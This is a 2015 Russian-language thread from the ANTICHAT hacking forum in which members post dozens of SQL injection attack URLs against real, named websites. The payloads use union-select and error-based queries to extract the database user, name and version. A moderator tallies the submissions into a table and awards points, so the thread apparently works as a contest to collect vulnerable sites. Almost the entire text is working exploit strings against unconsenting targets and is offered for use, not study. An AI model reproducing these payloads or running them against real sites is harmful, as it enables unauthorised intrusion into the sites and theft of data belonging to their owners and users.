ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.06.2015, 12:18
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от dmn75
dmn75 said:
↑
Да, тулзой кручу.
Сайт: theatreinchicago.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.theatreinchicago.com/news.php?articleID=999999.9 union all select 1,[t],3,4,5,6,7,8
Сайт: tsgconsumer.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.tsgconsumer.com/news/article/index.php?id=7999999.9' union all select 1,2,3,[t],5,6,7,8,9,10,11,12,13,14,15 and '0'='0
Сайт: alicekwartler.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://alicekwartler.com/product-list.php?id=999999.9 union all select 1,[t]
Сайт: athenscine.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://athenscine.com/showing/details.php?id=999999.9 union all select 1,2,3,4,5,6,7,[t],9,10,11,12,13,14,15,16,17,18,19,20
Сайт: classifieds.chiangmaicitylife.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://classifieds.chiangmaicitylife.com/indepth/details.php?id=1261 or 1=[t] and 1=1
Сайт: cstv.collegesports.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://cstv.collegesports.com/ncaa_bkup/default.php?id=999999.9 union all select 1,2,[t],4,5
Сайт: ctnrecruiting.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://ctnrecruiting.com/event_details.php?id=999999.9 union all select 1,[t],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
Сайт: diarionecochea.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://diarionecochea.com/videos/view.php?id=999999.9' union all select 1,[t],3,4,5,6,7,8 and '0'='0&titulo=TN en vivo
Сайт: dogarchive.kennel-apbt.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://dogarchive.kennel-apbt.com/details.php?id=150874' and [t] and '1'='1
Сайт: eu.bosscom.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://eu.bosscom.com/product.asp?id=[t]
Какой именно запрос на вывод нужен? я засчитал все те, что с выводом, не болкируются wafом и не присутствуют уже где-либо, остальные либо докручивайте, либо ищите с выводом, если не получается.
|
|
|
07.06.2015, 19:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
14926
Репутация:
17
|
|
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9%20union%20all%20select%201,2,3,4,5,6,999,8,9,10,11,12,13,14,15,16,17,18
Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.judgement-yard.com/index.php?pageID=999999.9%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,999,12,13,14,15&detail=log&id=75
Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://newchristian.com/view.php?id=999999.9%20union%20all%20select%201,2,999
Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://patagonianshells.com/index.php?link=home&seccion=999999.9%20union%20all%20select%201,2,3,4,999,6--
Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9%22%20union%20all%20select%20,1,2%20and%20%220%22=%220&lang=english
Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.seavernon.com/index.php?id=22&lg=fr%20or%201=999%20and%201=1
Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=999
|
|
|
|
07.06.2015, 19:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
782
Репутация:
2
|
|
Сайт: www.justintime.in
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+
Сайт: www.hergolfgame.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+
Сайт: www.secretslk.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
Сайт: www.localfirstaz.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
|
|
|
|
07.06.2015, 20:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Rypjaer
Rypjaer said:
↑
Сайт:
www.justintime.in
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.justintime.in/brand.php?catid=-7%27+union+select+1,2,3,4,concat_ws%28version%28%29,user%28%29,database%28%29%29,6+--+
Сайт:
www.hergolfgame.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.hergolfgame.com/shopcat.php?catID=-6%27+union+select+1,concat_ws%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8,9,10+--+
Сайт:
www.secretslk.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.secretslk.com/productList.php?catid=-17%27/*!12345union*/+select+1,version%28%29,3+--+r
Сайт: dianaboutiquebd.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://dianaboutiquebd.com/saree_cat.php?catid=-14+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
Сайт:
www.localfirstaz.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.localfirstaz.com/directory/category.php?catid=-508+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29+--+
добавил в таблицу.
Сообщение от Печа
Печа said:
↑
Мои первые в жизни уязвимости, раньше ни когда этим не занимался, начал интересоваться этой тематикой, совсем недавно, после того как зарегистрировался на этом форуме, поэтому не судите строго если что не так написал.
Сайт: isotropix.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.isotropix.com/index.php?to=news&view=viewid&id=999999.9 union all select 1,2,3,4,5,6,[t],8,9,10,11,12,13,14,15,16,17,18
Сайт: judgement-yard.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.judgement-yard.com/index.php?pageID=999999.9 union all select 1,2,3,4,5,6,7,8,9,10,[t],12,13,14,15&detail=log&id=75
Сайт: newchristian.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://newchristian.com/view.php?id=999999.9 union all select 1,2,[t]
Сайт: patagonianshells.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://patagonianshells.com/index.php?link=home&seccion=999999.9 union all select 1,2,3,4,[t],6--
Сайт: rhodesnow.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.rhodesnow.com/rhodes-guide/pages.php?id=999999.9" union all select [t],2 and "0"="0&lang=english
Сайт: seavernon.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.seavernon.com/index.php?id=22&lg=fr or 1=[t] and 1=1
Сайт: watch-clock.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.watch-clock.com/01-07/03/01/0a/a-01.php?ProductID=[t]
на blind нужен вывод, для остальных уберите это [t], которое добавляет софт, чтобы был нормальный вывод
|
|
|
|
11.06.2015, 21:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
15245
Репутация:
11
|
|
Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-
Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-
Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+
Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
|
|
|
|
14.06.2015, 22:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
6419
Репутация:
2
|
|
|
|
|
|
15.06.2015, 03:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
14926
Репутация:
17
|
|
Сайт: http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14
|
|
|
|
15.06.2015, 03:25
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Печа
Печа said:
↑
Сайт:
http://www.yd1688.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.yd1688.com/en/about.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14
предыдущие поправьте на нормальный вывод.
Сообщение от 3nvY
3nvY said:
↑
Сайт: hexonline.co.uk
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.hexonline.co.uk/Product.php?cid=-6+union+select+1,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3,4,5,6,7,8+--+-
Сайт: fleurlis.com.tw
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.fleurlis.com.tw/en/scene.php?cid=1&id=-2+union+select+1,2,group_concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,4,555,6,7,8,9+--+-
Сайт: pnelsoncomposer.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.pnelsoncomposer.com/guides/stmarks/ShowCat.php?catid=-82+union+select+1,concat%28user%28%29,0x3a,database%28%29,0x3a,version%28%29%29,3+--+-
Сайт: puccimanuli.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://www.puccimanuli.com/pages/products.php?cat=-7+union+select+1,concat%28database%28%29,user%28%29,version%28%29%29,3,4,5,6,7,8+--+
Сайт: boutique.rrconcept.com
Уязвимость: SQLi
Эксплоит:
Код:
Code:
http://boutique.rrconcept.com/achat/index.php?catid=21%22+OR+1+GROUP+BY+CONCAT_WS%280x3a,USER%28%29,DATABASE%28%29,VERSION%28%29,FLOOR%28RAND%280%29*2%29%29+HAVING+MIN%280%29+OR+1+--+
все, 20 баллов набрано, поздравляю!
|
|
|
|
15.06.2015, 04:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
885
Репутация:
0
|
|
Cайт: http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
Сайт: http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
Сайт: http://gobpo.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--
Cайт: http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3
Cайт: http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999
Сайт: http://www.focus-lighting.com/
Уязвимость:
Эксплойт:
Код:
Code:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9
|
|
|
|
15.06.2015, 13:24
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Neon2211
Neon2211 said:
↑
Cайт:
http://www.cygnethome.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.cygnethome.com/showsub.php?id=999999.9%20union%20all%20select%201,2,999,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67--
Сайт:
http://www.blcontrol.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.blcontrol.com/products.php?MSecID=999999.9%27%20union%20all%20select%201,2,999,4,5,6,7,8%20and%20%270%27=%270&SecID=113&MainID=0&SubID=0
Сайт:
http://gobpo.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://gobpo.com/index.php?pageid=999999.9%20union%20all%20select%20999,2--
Cайт:
http://store.schulmerichbells.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://store.schulmerichbells.com/category.php?cat_id=999999.9%20union%20all%20select%20999,2,3
Cайт:
http://www.immobilien-niederzier.com/
Уязвимость:SQLi
Эксплойт:
Код:
Code:
http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,999
Сайт:
http://www.focus-lighting.com/
Уязвимость:
Эксплойт:
Код:
Code:
http://www.focus-lighting.com/showproduct.php?productId=4&productVariantId=999999.9%20union%20all%20select%201,2,3,4,5,6,7,999,9
очень много повторов, два из них отсюда: http://pastebin.com/tRpAyh1t
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
